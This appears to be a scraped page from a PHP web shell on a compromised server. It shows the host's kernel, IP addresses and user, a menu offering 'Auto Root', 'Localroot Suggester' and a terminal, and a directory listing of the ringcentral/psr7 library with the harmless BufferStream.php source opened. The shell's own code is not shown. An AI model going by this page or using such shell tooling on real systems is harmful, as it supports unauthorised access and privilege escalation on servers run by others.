Linux unitednationsplay.com 3.10.0-1160.45.1.el7.x86_64 #1 SMP Wed Oct 13 17:20:51 UTC 2021 x86_64
nginx/1.20.1
Server IP : 188.130.139.92 & Your IP : 3.15.147.225
Domains :
Cant Read [ /etc/named.conf ]
User : web
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
home /
www /
unp_probe /
vendor /
ringcentral /
psr7 /
src /
Delete
Unzip
Name
Size
Permission
Date
Action
AppendStream.php
5.39
KB
-rw-r--r--
2018-05-29 20:21
BufferStream.php
2.98
KB
-rw-r--r--
2018-05-29 20:21
CachingStream.php
4.1
KB
-rw-r--r--
2018-05-29 20:21
DroppingStream.php
1.06
KB
-rw-r--r--
2018-05-29 20:21
FnStream.php
4.05
KB
-rw-r--r--
2018-05-29 20:21
InflateStream.php
977
B
-rw-r--r--
2018-05-29 20:21
LazyOpenStream.php
911
B
-rw-r--r--
2018-05-29 20:21
LimitStream.php
4.12
KB
-rw-r--r--
2018-05-29 20:21
MessageTrait.php
4
KB
-rw-r--r--
2018-05-29 20:21
MultipartStream.php
4.53
KB
-rw-r--r--
2018-05-29 20:21
NoSeekStream.php
424
B
-rw-r--r--
2018-05-29 20:21
PumpStream.php
3.94
KB
-rw-r--r--
2018-05-29 20:21
Request.php
3.57
KB
-rw-r--r--
2018-05-29 20:21
Response.php
3.74
KB
-rw-r--r--
2018-05-29 20:21
ServerRequest.php
2.77
KB
-rw-r--r--
2018-05-29 20:21
Stream.php
6.31
KB
-rw-r--r--
2018-05-29 20:21
StreamDecoratorTrait.php
2.98
KB
-rw-r--r--
2018-05-29 20:21
StreamWrapper.php
2.76
KB
-rw-r--r--
2018-05-29 20:21
Uri.php
15.23
KB
-rw-r--r--
2018-05-29 20:21
functions.php
23.85
KB
-rw-r--r--
2018-05-29 20:21
functions_include.php
157
B
-rw-r--r--
2018-05-29 20:21
Save
Rename
<?php namespace RingCentral\Psr7; use Psr\Http\Message\StreamInterface; /** * Provides a buffer stream that can be written to to fill a buffer, and read * from to remove bytes from the buffer. * * This stream returns a "hwm" metadata value that tells upstream consumers * what the configured high water mark of the stream is, or the maximum * preferred size of the buffer. */ class BufferStream implements StreamInterface { private $hwm; private $buffer = ''; /** * @param int $hwm High water mark, representing the preferred maximum * buffer size. If the size of the buffer exceeds the high * water mark, then calls to write will continue to succeed * but will return false to inform writers to slow down * until the buffer has been drained by reading from it. */ public function __construct($hwm = 16384) { $this->hwm = $hwm; } public function __toString() { return $this->getContents(); } public function getContents() { $buffer = $this->buffer; $this->buffer = ''; return $buffer; } public function close() { $this->buffer = ''; } public function detach() { $this->close(); } public function getSize() { return strlen($this->buffer); } public function isReadable() { return true; } public function isWritable() { return true; } public function isSeekable() { return false; } public function rewind() { $this->seek(0); } public function seek($offset, $whence = SEEK_SET) { throw new \RuntimeException('Cannot seek a BufferStream'); } public function eof() { return strlen($this->buffer) === 0; } public function tell() { throw new \RuntimeException('Cannot determine the position of a BufferStream'); } /** * Reads data from the buffer. */ public function read($length) { $currentLength = strlen($this->buffer); if ($length >= $currentLength) { // No need to slice the buffer because we don't have enough data. $result = $this->buffer; $this->buffer = ''; } else { // Slice up the result to provide a subset of the buffer. $result = substr($this->buffer, 0, $length); $this->buffer = substr($this->buffer, $length); } return $result; } /** * Writes data to the buffer. */ public function write($string) { $this->buffer .= $string; // TODO: What should happen here? if (strlen($this->buffer) >= $this->hwm) { return false; } return strlen($string); } public function getMetadata($key = null) { if ($key == 'hwm') { return $this->hwm; } return $key ? null : array(); } }